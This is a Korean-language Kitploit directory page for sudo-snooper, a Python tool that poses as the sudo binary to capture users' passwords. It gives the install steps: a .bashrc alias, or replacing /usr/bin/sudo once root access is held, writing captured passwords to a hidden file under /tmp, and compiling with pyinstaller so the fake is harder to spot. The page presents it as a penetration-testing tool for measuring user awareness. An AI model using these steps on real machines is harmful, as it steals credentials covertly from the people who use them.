Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
sudo-snooper — 원래 sudo 바이너리처럼 작동하여 사용자가 비밀번호를 입력하도록 속이는 Python 스크립트 | Kitploit
도구/GitHubGitHub/xorond/sudo-snooper
Phishing ToolsPassword AttacksPenetration TestingSocial Engineering
GitHubxorond/sudo-snooper

sudo-snooper

원래 sudo 바이너리처럼 작동하여 사용자가 비밀번호를 입력하도록 속이는 Python 스크립트

저장소 보기
7034136년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

sudo-snooper

sudo-snooper는 원래 sudo 바이너리처럼 작동하여 사용자가 비밀번호를 입력하도록 속입니다.

원래와 동일한 가짜 프롬프트를 사용자에게 표시하여 sudo 비밀번호를 입력하도록 요청합니다.

이는 침투 테스트 또는 보안 평가에서 사용자 인식을 테스트하는 데 유용할 수 있습니다.

설치 단계

옵션 1 - sudo 명령어에 별칭 지정 (더 쉽지만 다소 눈에 띌 수 있음)

이 옵션은 더 쉽고 이식성이 좋지만, 주의 깊은 사용자에게는 더 눈에 띌 수 있습니다.

사용자가 사용 중인 셸의 .rc 파일(.bashrc, .zshrc 등)을 편집하고 다음을 추가하세요:

alias sudo='python3 /path/to/sudo-snooper.py'

sudo-snooper.py에 올바른 권한이 설정되어 있는지 확인하세요.

옵션 2 - 실제 sudo를 대체하여 설치 (더 어렵지만 덜 눈에 띔)

이 설치 옵션을 위해서는 루트 액세스가 필요합니다

이 옵션은 이미 루트 액세스 권한이 있지만 어떤 이유로 /etc/shadow에서 해시를 크랙할 수 없을 때 유용합니다. 기본적으로 사용자의 비밀번호를 피싱할 수 있습니다.

  • 원래 sudo 바이너리를 다른 이름으로 이동
# mv /usr/bin/sudo /usr/bin/somename
  • 파일의 파라미터를 원하는 대로 변경

sudo-snooper.py에서 다음을 변경하세요:

dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
  • 파이썬 파일을 /usr/bin/sudo (또는 이전에 sudo가 있던 위치)에 설치
# install -dm755 sudo-snooper.py /usr/bin/sudo
  • 파이썬 파일에 필요한 권한 부여

    여기서 좀 더 꼼꼼하게 사용자에게 읽을 수 없는 실행 파일을 만들 수도 있지만, 그 부분은 다루지 않겠습니다. 이에 대한 답변은 여기에서 확인하세요.

참고: 더 설득력 있는 설치 방법은 pyinstaller를 사용하여 컴파일하는 것입니다. 그러면 file /usr/bin/sudo를 실행했을 때 파이썬 파일로 표시되지 않습니다.

Archlinux에서 수행하려면: pyinstaller --onefile sudo-snooper.py가 작동합니다. 단, 컴파일 후에는 컴파일된 바이너리에서 파라미터를 변경할 수 없습니다.

사용법

설치가 완료되면 sudo-snooper를 일반 sudo와 동일하게 호출할 수 있습니다.

예를 들어, 다음을 실행하면

sudo vim /etc/resolv.conf

sudo-snooper가 호출됩니다 (올바르게 설치된 경우).

사용자 비밀번호를 묻고, 비밀번호가 올바르면 실제 sudo 바이너리로 리디렉션하여 명령을 실행합니다.

그런 다음 설정의 덤프 파일을 읽어 사용자 비밀번호를 확인할 수 있습니다.

TODO

  • 사용자가 잘못된 비밀번호를 입력했을 때 처리
도구 다운로드